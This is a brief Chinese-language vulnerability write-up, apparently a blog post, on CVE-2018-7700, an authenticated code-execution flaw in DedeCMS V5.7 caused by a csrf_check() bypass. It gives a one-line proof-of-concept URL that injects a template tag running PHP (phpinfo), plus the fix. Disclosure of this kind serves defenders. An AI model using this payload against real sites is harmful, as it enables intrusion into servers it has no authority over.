该漏洞的触发点为/dede/tag_test_action.php
。起因是csrf_check()
的绕过,导致可执行任意代码。
POC:
http://localhost/后台地址/tag_test_action.php?url=a&token=&partcode={dede:field name='source' runphp='yes'}phpinfo();{/dede:field}
![Dedecms V5.7后台任意代码执行[CVE-2018-7700]](https://ae01.alicdn.com/kf/Uf8bc8505674e4a058d3c52481e6fc567E.png)
利用条件:登录后台
解决方案:重新实现csrf_check()函数
原创文章,作者:Y4er,未经授权禁止转载!如若转载,请联系作者:Y4er